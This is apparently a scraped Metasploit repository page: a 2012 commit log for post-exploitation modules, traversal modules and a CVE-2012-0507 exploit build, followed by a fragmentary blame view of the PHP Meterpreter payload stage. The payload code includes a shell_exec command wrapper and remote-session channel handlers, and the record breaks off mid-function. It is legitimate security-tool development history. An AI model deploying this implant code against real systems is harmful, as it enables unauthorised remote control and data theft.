commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sun Mar 18 00:07:27 2012 -0500
Massive whitespace cleanup
commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 16:00:20 2012 -0500
Add back enum_protections with some new changes
commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd part av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
2012-05-16 01:00:02 +02:00
|
|
|
}
|
|
|
|
|
|
|
|
function register_command($c) {
|
|
|
|
global $commands;
|
|
|
|
if (! in_array($c, $commands)) {
|
|
|
|
array_push($commands, $c);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
function my_print($str) {
|
2011-05-13 03:31:04 +02:00
|
|
|
#error_log($str);
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
2010-06-08 09:59:36 +02:00
|
|
|
|
2010-06-23 22:00:27 +02:00
|
|
|
my_print("Evaling main meterpreter stage");
|
|
|
|
|
|
|
|
# Be very careful not to put a # anywhere that isn't a comment (e.g. inside a
|
|
|
|
# string) as the comment remover will completely break this payload
|
|
|
|
|
2010-06-15 02:33:24 +02:00
|
|
|
function dump_array($arr, $name=null) {
|
|
|
|
if (is_null($name)) {
|
2011-05-13 03:22:53 +02:00
|
|
|
$name = "Array";
|
2010-06-15 02:33:24 +02:00
|
|
|
}
|
2011-05-13 03:22:53 +02:00
|
|
|
my_print(sprintf("$name (%s)", count($arr)));
|
2010-06-15 02:33:24 +02:00
|
|
|
foreach ($arr as $key => $val) {
|
2011-05-13 03:22:53 +02:00
|
|
|
if (is_array($val)) {
|
|
|
|
# recurse
|
|
|
|
dump_array($val, "{$name}[{$key}]");
|
|
|
|
} else {
|
|
|
|
my_print(sprintf(" $key ($val)"));
|
|
|
|
}
|
2010-06-15 02:33:24 +02:00
|
|
|
}
|
|
|
|
}
|
|
|
|
function dump_readers() {
|
|
|
|
global $readers;
|
|
|
|
dump_array($readers, 'Readers');
|
|
|
|
}
|
|
|
|
function dump_resource_map() {
|
|
|
|
global $resource_type_map;
|
|
|
|
dump_array($resource_type_map, 'Resource map');
|
|
|
|
}
|
2011-05-13 03:22:53 +02:00
|
|
|
function dump_channels($extra="") {
|
|
|
|
global $channels;
|
|
|
|
dump_array($channels, 'Channels '.$extra);
|
|
|
|
}
|
2010-06-15 02:33:24 +02:00
|
|
|
|
|
|
|
|
2010-06-08 09:59:36 +02:00
|
|
|
# Doesn't exist before php 4.3
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
if (!function_exists("file_get_contents")) {
|
2010-06-08 09:59:36 +02:00
|
|
|
function file_get_contents($file) {
|
2010-07-27 23:16:15 +02:00
|
|
|
$f = @fopen($file,"rb");
|
|
|
|
$contents = false;
|
|
|
|
if ($f) {
|
|
|
|
do { $contents .= fgets($f); } while (!feof($f));
|
|
|
|
}
|
|
|
|
fclose($f);
|
|
|
|
return $contents;
|
2010-06-08 09:59:36 +02:00
|
|
|
}
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
2010-06-04 01:18:21 +02:00
|
|
|
|
2010-06-15 01:20:57 +02:00
|
|
|
# Renamed in php 4.3
|
|
|
|
if (!function_exists('socket_set_option')) {
|
|
|
|
function socket_set_option($sock, $type, $opt, $value) {
|
|
|
|
socket_setopt($sock, $type, $opt, $value);
|
|
|
|
}
|
2010-06-04 01:18:21 +02:00
|
|
|
}
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
2015-05-15 04:27:25 +02:00
|
|
|
#
|
|
|
|
# Payload definitions
|
|
|
|
#
|
|
|
|
define("PAYLOAD_UUID", "");
|
2017-06-05 13:15:27 +02:00
|
|
|
define("SESSION_GUID", "");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
|
|
|
#
|
|
|
|
# Constants
|
|
|
|
#
|
2015-05-15 04:27:25 +02:00
|
|
|
define("PACKET_TYPE_REQUEST", 0);
|
|
|
|
define("PACKET_TYPE_RESPONSE", 1);
|
|
|
|
define("PACKET_TYPE_PLAIN_REQUEST", 10);
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
define("PACKET_TYPE_PLAIN_RESPONSE", 11);
|
|
|
|
|
2015-05-15 04:27:25 +02:00
|
|
|
define("ERROR_SUCCESS", 0);
|
|
|
|
define("ERROR_FAILURE", 1);
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
|
|
|
define("CHANNEL_CLASS_BUFFERED", 0);
|
|
|
|
define("CHANNEL_CLASS_STREAM", 1);
|
|
|
|
define("CHANNEL_CLASS_DATAGRAM", 2);
|
|
|
|
define("CHANNEL_CLASS_POOL", 3);
|
|
|
|
|
|
|
|
#
|
|
|
|
# TLV Meta Types
|
|
|
|
#
|
2010-06-03 06:45:48 +02:00
|
|
|
define("TLV_META_TYPE_NONE", ( 0 ));
|
|
|
|
define("TLV_META_TYPE_STRING", (1 << 16));
|
|
|
|
define("TLV_META_TYPE_UINT", (1 << 17));
|
|
|
|
define("TLV_META_TYPE_RAW", (1 << 18));
|
|
|
|
define("TLV_META_TYPE_BOOL", (1 << 19));
|
2014-07-07 11:46:54 +02:00
|
|
|
define("TLV_META_TYPE_QWORD", (1 << 20));
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
define("TLV_META_TYPE_COMPRESSED", (1 << 29));
|
2010-06-03 06:45:48 +02:00
|
|
|
define("TLV_META_TYPE_GROUP", (1 << 30));
|
|
|
|
define("TLV_META_TYPE_COMPLEX", (1 << 31));
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
# not defined in original
|
2010-06-03 06:45:48 +02:00
|
|
|
define("TLV_META_TYPE_MASK", (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16));
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
|
|
|
#
|
|
|
|
# TLV base starting points
|
|
|
|
#
|
|
|
|
define("TLV_RESERVED", 0);
|
|
|
|
define("TLV_EXTENSIONS", 20000);
|
|
|
|
define("TLV_USER", 40000);
|
|
|
|
define("TLV_TEMP", 60000);
|
|
|
|
|
|
|
|
#
|
|
|
|
# TLV Specific Types
|
|
|
|
#
|
|
|
|
define("TLV_TYPE_ANY", TLV_META_TYPE_NONE | 0);
|
|
|
|
define("TLV_TYPE_METHOD", TLV_META_TYPE_STRING | 1);
|
|
|
|
define("TLV_TYPE_REQUEST_ID", TLV_META_TYPE_STRING | 2);
|
|
|
|
define("TLV_TYPE_EXCEPTION", TLV_META_TYPE_GROUP | 3);
|
|
|
|
define("TLV_TYPE_RESULT", TLV_META_TYPE_UINT | 4);
|
2010-06-04 01:18:21 +02:00
|
|
|
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
define("TLV_TYPE_STRING", TLV_META_TYPE_STRING | 10);
|
|
|
|
define("TLV_TYPE_UINT", TLV_META_TYPE_UINT | 11);
|
|
|
|
define("TLV_TYPE_BOOL", TLV_META_TYPE_BOOL | 12);
|
2010-06-04 01:18:21 +02:00
|
|
|
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
define("TLV_TYPE_LENGTH", TLV_META_TYPE_UINT | 25);
|
|
|
|
define("TLV_TYPE_DATA", TLV_META_TYPE_RAW | 26);
|
|
|
|
define("TLV_TYPE_FLAGS", TLV_META_TYPE_UINT | 27);
|
|
|
|
|
|
|
|
define("TLV_TYPE_CHANNEL_ID", TLV_META_TYPE_UINT | 50);
|
|
|
|
define("TLV_TYPE_CHANNEL_TYPE", TLV_META_TYPE_STRING | 51);
|
|
|
|
define("TLV_TYPE_CHANNEL_DATA", TLV_META_TYPE_RAW | 52);
|
|
|
|
define("TLV_TYPE_CHANNEL_DATA_GROUP", TLV_META_TYPE_GROUP | 53);
|
|
|
|
define("TLV_TYPE_CHANNEL_CLASS", TLV_META_TYPE_UINT | 54);
|
|
|
|
|
|
|
|
define("TLV_TYPE_SEEK_WHENCE", TLV_META_TYPE_UINT | 70);
|
|
|
|
define("TLV_TYPE_SEEK_OFFSET", TLV_META_TYPE_UINT | 71);
|
|
|
|
define("TLV_TYPE_SEEK_POS", TLV_META_TYPE_UINT | 72);
|
|
|
|
|
|
|
|
define("TLV_TYPE_EXCEPTION_CODE", TLV_META_TYPE_UINT | 300);
|
|
|
|
define("TLV_TYPE_EXCEPTION_STRING", TLV_META_TYPE_STRING | 301);
|
|
|
|
|
|
|
|
define("TLV_TYPE_LIBRARY_PATH", TLV_META_TYPE_STRING | 400);
|
|
|
|
define("TLV_TYPE_TARGET_PATH", TLV_META_TYPE_STRING | 401);
|
|
|
|
|
2015-05-15 04:27:25 +02:00
|
|
|
define("TLV_TYPE_MACHINE_ID", TLV_META_TYPE_STRING | 460);
|
|
|
|
define("TLV_TYPE_UUID", TLV_META_TYPE_RAW | 461);
|
2017-06-05 13:15:27 +02:00
|
|
|
define("TLV_TYPE_SESSION_GUID", TLV_META_TYPE_RAW | 462);
|
2015-05-15 04:27:25 +02:00
|
|
|
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
function my_cmd($cmd) {
|
|
|
|
return shell_exec($cmd);
|
|
|
|
}
|
|
|
|
|
2010-06-04 01:18:21 +02:00
|
|
|
function is_windows() {
|
|
|
|
return (strtoupper(substr(PHP_OS,0,3)) == "WIN");
|
|
|
|
}
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
##
|
|
|
|
# Worker functions
|
|
|
|
##
|
|
|
|
|
|
|
|
function core_channel_open($req, &$pkt) {
|
|
|
|
$type_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_TYPE);
|
|
|
|
|
2010-06-03 00:43:03 +02:00
|
|
|
my_print("Client wants a ". $type_tlv['value'] ." channel, i'll see what i can do");
|
2010-06-15 02:33:24 +02:00
|
|
|
|
|
|
|
# Doing it this way allows extensions to create new channel types without
|
|
|
|
# needing to modify the core code.
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
$handler = "channel_create_". $type_tlv['value'];
|
|
|
|
if ($type_tlv['value'] && is_callable($handler)) {
|
2010-07-14 00:51:15 +02:00
|
|
|
my_print("Calling {$handler}");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
$ret = $handler($req, $pkt);
|
|
|
|
} else {
|
2010-06-03 00:43:03 +02:00
|
|
|
my_print("I don't know how to make a ". $type_tlv['value'] ." channel. =(");
|
|
|
|
$ret = ERROR_FAILURE;
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
2010-06-04 01:18:21 +02:00
|
|
|
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
return $ret;
|
|
|
|
}
|
2010-06-13 18:44:22 +02:00
|
|
|
|
2010-07-14 00:51:15 +02:00
|
|
|
# Works for streams
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
function core_channel_eof($req, &$pkt) {
|
2010-06-03 00:43:03 +02:00
|
|
|
my_print("doing channel eof");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
|
|
|
|
$c = get_channel_by_id($chan_tlv['value']);
|
|
|
|
|
|
|
|
if ($c) {
|
2010-07-14 00:51:15 +02:00
|
|
|
if (eof($c[1])) {
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_BOOL, 1));
|
|
|
|
} else {
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_BOOL, 0));
|
|
|
|
}
|
|
|
|
return ERROR_SUCCESS;
|
|
|
|
} else {
|
|
|
|
return ERROR_FAILURE;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
2010-07-14 00:51:15 +02:00
|
|
|
# Works
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
function core_channel_read($req, &$pkt) {
|
2011-06-30 12:28:04 +02:00
|
|
|
my_print("doing channel read");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
$chan_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
|
|
